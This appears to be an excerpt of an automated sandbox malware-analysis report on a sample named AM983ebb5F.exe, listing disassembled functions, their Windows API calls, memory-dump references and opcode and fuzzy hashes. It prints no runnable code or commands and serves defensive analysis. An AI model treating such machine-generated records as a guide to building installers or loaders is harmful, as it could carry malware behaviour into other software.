                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3356406503-0
                                                                                    • Opcode ID: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                    • Instruction ID: fa4e9c421320e09d3f2bb14c05bc69cdd2f01bdd483ca55c6e8c3e2e171c6fbc
                                                                                    • Opcode Fuzzy Hash: de231594f5fd9ed2f3d170b787f0c7ae88dddfe38e809d01203d2a2c86ad2b9e
                                                                                    • Instruction Fuzzy Hash: 11116A71900219EBDB14DFA0DA989AEB7B4FF04349B20447FE406B62C0D7B85A45EB5E
                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                    • Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
                                                                                    • Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
                                                                                    • Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C
                                                                                    Function 004056AF Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 004056BF
                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                    • CoUninitialize.COMBASE(00000404,00000000), ref: 0040570B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeMessageSendUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 2896919175-0
                                                                                    • Opcode ID: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                    • Instruction ID: 02e921673ef7eca27cac182cfb7c492375eb89174892ab9280a6a273fd68093a
                                                                                    • Opcode Fuzzy Hash: bbf0263ab9fe446523fd7f753457698ace2b8a2c52ebc29179148d008809b166
                                                                                    • Instruction Fuzzy Hash: 62F0F0728006009BE7011794AE01B9773A4EBC5316F15543BFF89632A0CB3658018B5D
                                                                                    Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AED
                                                                                    • GetLastError.KERNEL32 ref: 00405AFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
                                                                                    • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                    • Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9
                                                                                    Function 00401EE3 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnableShow
                                                                                    • String ID:
                                                                                    • API String ID: 1136574915-0
                                                                                    • Opcode ID: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
                                                                                    • Instruction ID: 5ff066b55785a601c9e0ac29068a23864f952070569c454aea33db173c3c2586
                                                                                    • Opcode Fuzzy Hash: 25d484baa04e9b6e4f62fc7871d61afe8f606dd1a39771946dafa5186f6494a1
                                                                                    • Instruction Fuzzy Hash: 29E09A369082048FE705EBA4AE494AEB3B4EB80325B200A7FE001F11C0CBB84C00966C
                                                                                    Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abelsa",?), ref: 00405B63
                                                                                    • CloseHandle.KERNEL32(?,?,?, abelsa",?), ref: 00405B70
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3712363035-0
                                                                                    • Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                    • Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
                                                                                    • Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
                                                                                    • Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78
                                                                                    Function 00401578 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1268545403-0
                                                                                    • Opcode ID: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                                                    • Instruction ID: ac0fea7dd280022ba88880c6e2ee8458450bfb5d79ff8b32edbe1086f76aca9f
                                                                                    • Opcode Fuzzy Hash: 0f5042c3400ff8d174245560ea6e81256fc6b3c7d69c517c03b76bd4f09c2680
                                                                                    • Instruction Fuzzy Hash: 02E04F32B10114ABCB15DFA8FED08ADB3B6EB48320310143FD102B3690C775AD449B18
                                                                                    Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                                                                      • Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                                                      • Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
                                                                                      • Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
                                                                                    • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                    • Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9
                                                                                    Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\AM983ebb5F.exe,80000000,00000003), ref: 0040604B
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                    • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                    • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                    Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                    • Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
                                                                                    • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                    • Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694
                                                                                    Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                                                                    • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
                                                                                    • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                    • Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D
                                                                                    Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
                                                                                    • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                    • Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4
                                                                                    Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
